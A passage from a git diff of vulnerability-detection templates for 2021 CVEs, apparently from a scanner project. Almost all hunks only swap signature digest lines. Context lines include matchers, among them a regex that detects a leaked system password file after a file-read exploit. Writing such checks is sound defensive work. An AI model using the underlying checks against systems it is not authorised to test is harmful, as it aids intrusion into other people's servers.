4b0a00483046022100f4af3fc795b05e481a951af64b6632e6071032c7b4503c9b2234f3ff60d2d46502210084e7c836935d4b41e29b97560a8c955966a67a9b3f36afb1e18ec05970eb944f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 1a3d34bf8f..aeefeb7c18 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fce92007765ca1c9e77b455b9644efb238fa42f54a32aba3bda463c18c50b24a02210084bc8d1d3dee9eb10757e7d53b4a4f6d9f846178a196fbc87f439ece337ffc6d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008424b7a4700f31db37b037d060ff20fd01d499186d0a755b87ac4d0db1c4d492022100897920dffe55bd73b6517552dfe97de3d9569aa43b03de6abb38fa99e8a03de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 02bde4222b..dab0e8578d 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206c3761307ecb32e1eecbe1b04ea6c017319881301fb5434dd7f29b3e3caf3de0022100b62f95c256c0fc8b0858b77ff96c3cecf0e7a568ecd705a1af7c8f834cd93ca0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e62a65befe2d8a07a4a55c721baaef5045defec929b48b630db57d89a394a4b00220731247a1be999a6c2aa77de009ef0c45bc17d8706699f8b7f48045a0ba8f7cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 85d6b6a705..dc181c99c0 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206dab006c5fe3e4664f2e6d0a96c761e1c626afd299149055f9952e862c360f0302202c05b140a61323016869961a5c28652e5ed79f5c8df3539d070189296afd8607:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a43e507e2ee00477edaf12ddcb5911ea9b9303881c8983e9fa5b6496acbd5a4022100f6423e3e4bdfaf6b6c047f277f7e66138243d9476b454c1b882442fd473fc5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 5104f05e5e..8d09d1d2c8 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205c972d0bbf14d98bc7bc9cbf8d4a29657556a5aa6f87fb374822fc4f87decea5022100d07d80ce9d022d4edbef96608c05ec4cc47c4b330d426949bb15d036b40856e3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206bf6488451470b278303999edbd8cba4745fe2ad1904442d230e5497fe68a799022060d60c559cf045660cc14e3d1aab2c2fffc29d49cdce7bffb423237ec87efe16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index d42025daf2..8466131cc8 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207cc7d20d84259a5a475e96fc5510265f8c8091d0f9865bfb975733c51880f6420221008f795b5a8bc5e501f9285586f727b130140c6323e1f75aa63a32e45e15d423c7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f6a6cc73ed8b3b34c09997fa465185e046ae8665c2f21138e5a8265fc61ed1d8022100c98bb4777bce42499cf3a03873e8396a1115cf0635221f53c7c7aa4acea88329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 3aea9498fa..eb2ab7724f 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -44,5 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect\"")' condition: and - -# digest: 4a0a0047304502205b0a6bf601d75b6a5322fe557f4b2cef4c028c12fb0c881f8c2e117042dbca4a022100edd4250a4e2351dcffb032177cca07398f4636854ae06fabd753b173391e2194:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f16703a93dd7e428dd763a98376cbd0b656df198e4db5792f4c7eaf38b9e4c5c022100bab6d166ee48e47058a13dc2498a32317972abe0d02c626b22d572d4f3209906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index be55d614a6..8f650c71bf 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205a2cbd236b7147fda3a1e4ad85098db804bd85946c16ff7627c34e6bf04e2ed30221008f68655ce2dff1b02db1c7a29bee73870d3e63c01de3f061b45cb404d2d418c9:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220123c9b315337338f16e8a114a28a071b4e6c2aca0f86bf6994e006dea47fd5100220197976c36119142ae2d90c985ca50827cddb64527643b25f136edf96b2c517dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index b63747e97a..9e9350dda8 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200e0e07ed8ba7c4a4a614029aed1da93c88422ceff7583939acda438804e08c3d022100bc959fb27ac4f32dd859137449c8a30a0e2f02f183a7ffb09ea8b185f9cf0fb7:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022057a0ef19d8a7467227f28a5d46d6a8fdbedcf248041a35a32411a73a4b790c39022036313edfe4c3276daff178977027667850c448a85248479405500304f7826768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 76ff31ebb1..3f6a1ad64b 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220435a558895bf964a41c62dbcac762aceddf255e930c0ac318af5f9d9c594bf6402210093d48d181a8909e4c03fadcec19d416d70ced80d61b86a2eaf6e37c05c727a11:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206e10e66debf3071ef5389d69698f8c8ee35f2c37edfb6aa2ba488a9377e1ccb902206b884936c0141846eb30acd271af739b55807d8fc16a92a3f38fb708dacbb901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 82996a7b03..f0c1aac13a 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210098bdaff7b7b586c40ee22a641262192e21edde08cf24f9354a921c7db3af3fad0220681ab00b1a07f25d102bedaffc69033f72908ba169c0c9c19b38eeafdc600740:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207c0b46b408e0fe34bfa03644d26e392ef797fd94f17b72d9a51c7a92f08bb681022030cc43af05d05a39137540174268a3acb10784a389b65c4f08e7e9a6f3298db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 8b698a500b..189a63f2e4 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205b79b75c7a641aa52bf086a3654437e282b4e774be0d658f82c7de1676ba9e1702206db81cbcf4066b20338aa9cb39a45647ed1e4603ebd3a87fb77477aa756cffb8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d3cbeecc4b866636edea984fff6d5eef68fc6535773d1f505e57f03bc9e9a867022100841fe270c2d82486ca1cc4410b603fb6ca62a190c51d66bf449d0d2144255bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 00148d0a7b..b7e3ad9703 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206b377016a4ebf203542ff5468cc95688d2bb0a7fbf0dd71aec6a70da74d583f602205ea816b1a8cea9044cbaa2175fdd9989da9090a4e8d91293aa709cbe87b5b555:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022078e2305ba5c0fb1aacd9c7ac80bb081c3fa028a9397ddb7d6b9bb038c499f2280220343de60383ad127ea454c51a2ed33dc546cac456cf251eaae00ab2d1d2bd5b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 3ca7d029a7..7325b1075e 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a609856e763f664efc31e5cf0c5cff8beb78229b7d1b0e8b5b6d5891d897cb2d02204ef98b99435018260af9b2ce63862036514b82783a499775746fac906e378250:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220554266548f3f3fc82af5e7312961dd97d5e133ee031c022ed473b2048f197e2b022100977788c9f3706289747e35b29d883c78941af5b695546fa55e89dbf505cd50a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 0b10d9e2f9..359cfba4cb 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022040dd38289757b3980bc286953122023f5d3d8d0ebbad3ea16e81b3313e364051022100e2797c232832a1a001429715b308e43bae4d56e04e9be9177594d57db706294e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc6f139659c8b9397ce40a539b0eb439470ee261d5785c392be2c7deed7fb9b202204cc16586745b0f107d707380997d2556be60c8b025ed00dbe1bc8ed524dc5938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 12cda87d70..e7f1583860 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -55,5 +55,4 @@ http: group: 1 regex: - '"subTitle":"Grafana ([a-z0-9.]+)' - -# digest: 4a0a00473045022100945233339c3e40ec1f56a08e47d6c9e58212ccbefe91bf489feb6200d2fc12bf02207662f49e6192d162b431f5192436e774a35bb7e4896e644a76bd9050397ccfb4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f3fd1438ed8ae801c6cdebdceb7598bcdd860e4c0a82ff6ffb8435593634b5bb022100eecc6f0d6c22cfd2bdad35dc6438a880bba25df10a9598d10d40774de237c0b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 82e0654006..45cca6d111 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205596626898953b7e98931664ccc3ac18b92c7e09e8489a3be3128c39bf69a762022002fd2f0651db106d4eff918816107812e7ddc4203f328cc7a161d7d3b9448e16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ac3ad2f5de7cc34cf28877dfb1eb9e944cd8126746a54f71fadad016d2945a20022026545d203bfa36bf4a928e8f17a189a00f498d20ec73e88e678b20dfcc2d3685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index 0573c25263..9124a27503 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -52,5 +52,4 @@ http: - 201 - 200 condition: or - -# digest: 4a0a0047304502202db3ee0acacf9411cccbef797759517e5b73669ce8d49234937a59b10e6841eb022100c7750fb80c94075d43cbbe3abaf8e1ddbdd79b6dc20960942cfe8184678fc90c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c0b75cc004ac539e66bd7aea5d7b8b4024bb29239888cf07acd655f1d873364022025ff308330809db633407a1479676cc5cb40a1aeb42133aaf2a7ec68a8697829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index fc54b77384..891d678c42 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f986991aa926f0076ca072b18fd1f0c60ab18c559314d7ee5c71dcff6a92a53d022030e856d733840714c8d0a8e4a826614f5e622d4aba37a2eff449e151443fa2b3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207c0d74b9a4b9fcfd31b1ab7fe562c09d7a5771511202b86c20d7aea8fd467ede02204dceb46ca5f5d8d4611a39690904337a67a2775d2e681af4d72409a2d78303b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index a8966c440a..e928698ca0 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -36,5 +36,4 @@ http: - type: regex regex: - "root:.*:0:0:" - -# digest: 4a0a0047304502201d2e3321fa51ed1f130767937f41f943b9fc6c939fda3b968faa7195b0e8c59f02210084e75e572d693563c8279fb82cbcdcdc10d781349ec1f2f5c18ce87e90671599:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c81b872c2130877931c18156a20457ebd29cfe1b46eaf73e2cb77b1c76516d6002206d4426d226c48cc6028f5bd5d1dcbd71b1892092bc3145ec48becb948c1d21d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index c7e2dc27b2..6f3bb7df26 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201144160d8498898b02e96c62d017c4e67800a3525df9d8ec577e2f7e8e64af45022100c53dc8628e73ad3bbe2e57a7e6416ba44f24fc858cc0845ebf85228aa6a4987e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206f56176f8038653332ef4cb4d553e3aabb389ca46354926fb435ff6f72b0172b022100e0f9b378bb9505d0297a7ed6c7138f8ab7908c44e3f046306a5c8a5cc83ee289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 773e936ca8..2ba2e3752b 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 500 - -# digest: 4a0a0047304502202464a41907cbc7d5bef11ea419654ffa0d7966ebd56d7a3f9ea0b7c31370180d022100a549952e97e13d8d84ad0f76850b59582376599582907b3341c703be96e5eb19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ae3fa4e5db8e05c351aa4efe9123e6cc4a0d4fabcfaf551173711b6111ce643602200b42a627a81d1dc8cabce6a2853c7bd857667a5efc576d1853859a6a11255872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 2d0401c360..f34ee678fe 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -39,5 +39,4 @@ http: - "payara.security.openid.default.providerURI=" - "payara.security.openid.sessionScopedConfiguration=true" condition: and - -# digest: 4b0a004830460221009615e12c52b7cdfb15f2a93e7805ece385006fcdddaf14315eecaaf9db650e4f022100c501d71e99b421b20df5148a9540e19d5ce2b56ca4c0da59e28270c10ac19b37:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202320f85c4999ccd702ec10d65ae28e93849920aa00de305d007536bb4ff2d45e022100dfa820eb3ea2dfd094146bde6d787ef1666e0fe2f6a76ded89e498bbcbd0fb26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index d0ae50256c..024524a51d 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -79,5 +79,4 @@ http: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body - -# digest: 4a0a00473045022066bfb4e78e8121c757e4c07b3d7293810f667e2b7127c3d31b36e3e7e9715793022100ab19e1e0cb34bedf4ba47021990f9456b9c3a26bc7a9151e5c1c1328a26a354f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fc9ec13e917f310696bfce40f04d93e5ecd9b94b7654632547df83206f241a7702200f626184fe33da1ff442fc63197cfc326410f11e0f00ff3c74694125fc6e247f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 045546cfd9..8d51740a18 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bec60629d3145e4e70b7c0250c63b0cd91f7387d625e6004430840c9221f07120220428aa42183d97ac6eb838511d3b7f6698c5f58687861cf9ac394b565554ea45d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205b6c0fd6be0bafa488e6f3a37b57841665e84b07b837557b09495ba4a11728200221009e46edfdf4acac9f11123f8bf192cc0c589b3b0be9532711ec4944275be93b73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 7cd9ec802a..6f234f2331 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e9dc035af6f4146ce47bbb6b3f54e72cbe9cfd36e96487b68129a4bc6047f39a02202fa47179f898b83daa811935e1fee0c3bf2f6df3ed741ebafa4ef72ec60244b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022077c5a97946e1b448d2a89c5899ed5a4fe6ec6dc611bc02df00bd9117f0cc8913022100ca4cac909985e4218deb751c9220fbb985e6d84f44ad105ac934050ff7fbe565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index 938c0829da..72ee2c16a4 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220149d19e783464bd1ba2893ef52eeeacc74864eaa44ca63d3ec1fd5dda8b9b38202207db1300c00815946064ece953d2cdf9ccc5e9a994ec00d49f2d288646685a0d5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd1ad4cf4527e15fa0ac30ce6b4f6a91baa8af0cc699164ccc08e434b04cfa81022100e92dfcc353a87929434d2cd777dfdb80d26e08d3c02aae8b00461779a0fdefe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index efbe8a9a78..49f7ad67d8 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009ce14dc893a77fbdbe7e382636934bc37f0525ab6091bbec25c2e6da0b922416022052b9e74f46b50720ccd85fe890300b9218deb1b83d711244db376dbe088b485b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022010ba2f7a4c661a3f28f70c5d22be358401d78723a6c2e8a772b4a756081de03402207637766e0d2a5f8fcfa9fbe789d882e7c8488ac7af6dfa7460cf0549ca6d0b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 463473aa82..1d062a01c3 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200d2215c085bc0342d168aa2ddb65401af94dc3a9ac8438149c4ef1480eeb19f5022100a8248dfeffc7cffc4dcdf3ea4624ec9745abcefab5b0dc28f0ae4a1aab81a314:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200dad9aad8b52ba488849f45a13ae1f40ce44ede8c28638d60a9aa7a4683dfcad02200a318b95918a011456ec9d79d51d71ffe756728d86cb1eb7cd5c214fda82074d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 2d49a1d0ac..368b425ca8 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -57,5 +57,4 @@ http: - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' - 'status_code == 200' condition: and - -# digest: 4a0a004730450221009751eabe88404e4edea345826f5c2bf0591bf6f2b909ed33559bf7a9c469c863022021108e173daee8499ed5cf3421048a32379deebcc8e12815a066dd40e5a734aa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a34125a1c18e77690c6f0c9eb2b1c509d902c78c9996492973ec7457855470e7022100e87e08278c54d172e870d0e82c6e3c9f3ed230450039e20da532b25361bc1a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index d0f487e792..ef165ab99b 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -61,5 +61,4 @@ http: name: LFI regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100ddb4f68b4c04ac17e6d6d04061212ea4e486d811d53c4dbb9e4d9cb83464bc4d022100ad1cfaf700e34a715106aac071983a9a22efd4d5964286f51f09a14c7fcb93d9:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022077d9f2658579e2d31385ee563368d2f8ccf5cd4aa97a52fbed807a92fdf1dc35022003c0fce668c76ab9568324fd833efee301836972490b3ada96817a33b2d48658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index 66f9379ae0..15f8e076f0 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -43,5 +43,4 @@ http: - 302 - 301 condition: or - -# digest: 4a0a0047304502202e92a09599c3e7fe3c133ae5630db5ccea2e04f53dc5b5b94ddc7df877574e5a022100fa39d2873340d4a0690260339b8a65fdd3ea8ab3635d0f37a8f6f92720b7d269:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b4aad873051fb8fee66d9bf2c3cfdc38e7a9972cdd832a264cce9eaf8f5d8a7402203bb0f7f7e016830d1d480b9d1ee26b79e86104f1682d1f41a9503a42c5cb0d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 852efb2b21..7645349abb 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206bc52414ec238c889f05c3f68479b650fbf490ff979cfd4cfd11209b3e45638902202a47e970c39a30b811b295b5dc6325c8a1067d67769aa9a166d028cd1cb56f7f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022073c2637cb1b7e857b6b60ee3c71f82e2b704ef9690a8ff1f7f43592df6a620d8022100a18cc0790dab25f1e2de664cff931a7d3b61463adada9305729ceec342624607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index b714e71081..9792746e79 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c57dcc6dc6bbc443f52b8c4423fc320a82e57884d29eaa4162acaa77eea432a8022078138fcf05b1817b850b68571237e312fe2fc235abd27ed66befa9acf581501a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009a9f3f064e0201ec591aa6aa957c25444ae625bdb4861b922367ca8c6a1df4a0022059cd1f8f46c8b462c469ad68491853fb5d1db093c41f79527014545e432c4f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index bd23fe0efd..68ecc8d902 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -64,5 +64,4 @@ http: name: LFI regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022053f03e1f4adb38a7f5f4feab3aaad0c528e6ee0f4e6827214537d6c304f3349d022100f90244aba7a4ff6a32e27a4f66a19350dff5c52a5a4cb914c7ea9efc3b4aa25d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b75bc2a8f5b0c6ada15b607a41c38cc943744f888f39de5395e9c058e7ca130c022100a76b2ef07fca854a9f0f6f4047f92244bbb16c4cdb15ff4790e8db560e211cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index b5e6042324..0857c169a9 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022041a1177564edd7128369fdc654ceb91b737f1b60306a28bb6df6639524f9882b022100db95874664d117cda65bc654315db1f8bc50ec9001f4e2f2a8ed666f22c57c06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049467d9427647f285a378b5c72cdb3c313a09250db3c71127f1b3db381260436022100f9a80012c80756549afcc50e5d1c36ff1ece8eb869a81b5194cdb132622b8b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index e60b772dc0..04722f52d5 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -87,5 +87,4 @@ http: - '"token":"(.*)"' internal: true part: body - -# digest: 4b0a0048304602210080350ac6168afbef8c7e031908d7aab9c59e052cb3aaed5ced5396a61fbf81d2022100caa152339f437c3035e04e9390b76145a76f9bb48f740ea9f25048bbefbb8f89:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d0a789c0bef62095ae329c3725f96d2997ca162b63ff3a850847fccd4edf897002210082db0c54256faab0d9d975216933014806ea9d9d10784da5aed20e6598c71f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 9fd4255f60..a1bb429c70 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -119,5 +119,4 @@ http: part: body words: - "System.ArgumentNullException" - -# digest: 4a0a004730450220286c29f1ea3b6f7ec033b0344e6c2fd4b5da4cb86c37e1370f1f1b123e886224022100ff45b52c23c3b26af4106ebace855b86947d646f1b6a7a97d784adf2c000b89b:922c64590222798bb761d5b6d8e72950 +# digest: 